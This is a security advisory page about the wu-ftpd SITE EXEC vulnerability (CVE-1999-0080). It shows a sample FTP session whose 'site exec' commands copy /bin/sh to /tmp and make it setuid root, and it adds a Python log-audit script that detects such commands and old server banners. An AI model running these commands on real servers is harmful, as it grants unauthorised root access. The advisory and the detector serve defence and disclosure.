FTP SITE EXEC command - Internet Security Systems

advICE :Intrusions : 2001305
Summary

Intrusion attempt.

Details

Old versions of FTP servers support this command, which permits undesirable access to the server.

In wu-ftpd versions below 2.2, a vulnerability exists whereby a hacker/cracker can execute a program. The following shows a session where "robert" has a legitimate account on the system and is attempting to create a command-line shell that he can run under.

220 example.com FTP server (Version wu-2.1(1) ready.
Name (example.com:robert): robert
331 Password required for robert.
Password: foobar
230 User robert logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec cp /bin/sh /tmp/.runme"
200-cp /bin/sh /tmp/runme
ftp> quote "site exec chmod 6755 /tmp/.runme"
200-chmod 6755 /tmp/runme
ftp> quit
221 Goodbye.

Now a user (logged in normally) can run a shell with root privileges from the /tmp directory.
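
A defender's check for the session above, as an added example that is not part of the original advICE page: it scans a recorded FTP control channel for a wu-ftpd banner below version 2.2 and for SITE EXEC commands, and notes whether the server answered with a 2xx reply. The `C:`/`S:` direction prefixes, the `audit` function and the sample lines are assumptions constructed for illustration.

```python
import re

# Constructed sample: control-channel lines as a proxy or sensor might record them.
# "C:" = sent by the client, "S:" = sent by the server (prefix format is an assumption).
SAMPLE = [
    "S: 220 example.com FTP server (Version wu-2.1(1) ready.",
    "C: USER robert",
    "S: 331 Password required for robert.",
    "C: PASS ****",
    "S: 230 User robert logged in.",
    "C: site  exec cp /bin/sh /tmp/.runme",
    "S: 200-cp /bin/sh /tmp/runme",
    "C: SITE HELP",
    "C: SITE EXEC chmod 6755 /tmp/.runme",
    "S: 200-chmod 6755 /tmp/runme",
    "C: QUIT",
]

# Greeting banner in the form shown on this page: "(Version wu-<major>.<minor>"
BANNER = re.compile(r"^220[ -].*\(Version wu-(\d+)\.(\d+)", re.I)
# FTP verbs are case-insensitive and may be separated by any run of whitespace.
SITE_EXEC = re.compile(r"^SITE\s+EXEC(?:\s+(.*))?$", re.I)

def audit(lines):
    """Return findings for old wu-ftpd banners and SITE EXEC commands."""
    findings, pending = [], None
    for n, raw in enumerate(lines, 1):
        direction, _, text = raw.partition(": ")
        text = text.strip()
        if direction == "S":
            m = BANNER.match(text)
            if m and (int(m[1]), int(m[2])) < (2, 2):
                findings.append({"line": n, "kind": "vulnerable-banner",
                                 "detail": f"wu-{m[1]}.{m[2]}"})
            elif pending is not None:
                # First reply after SITE EXEC: a 2xx code means the server ran it.
                findings[pending]["accepted"] = text.startswith("2")
                pending = None
        elif direction == "C":
            m = SITE_EXEC.match(text)
            if m:
                findings.append({"line": n, "kind": "site-exec",
                                 "detail": (m[1] or "").strip(), "accepted": None})
                pending = len(findings) - 1
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f)
```

A finding with `accepted` set to true is the case to escalate, since the server executed the command rather than rejecting it.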

More information

wu-ftpd
  More information about this popular FTP daemon.
advICE: FTP defense
  How to harden an FTP server against Internet attacks.
advICE: FTP exploits
  A list of common ways that intruders break into FTP servers.
CERT: CA-95.16.wu-ftpd.vul
  wu-ftpd Misconfiguration Vulnerability
CVE-1999-0080
  wu-ftp FTP server allows root access via "site exec" command.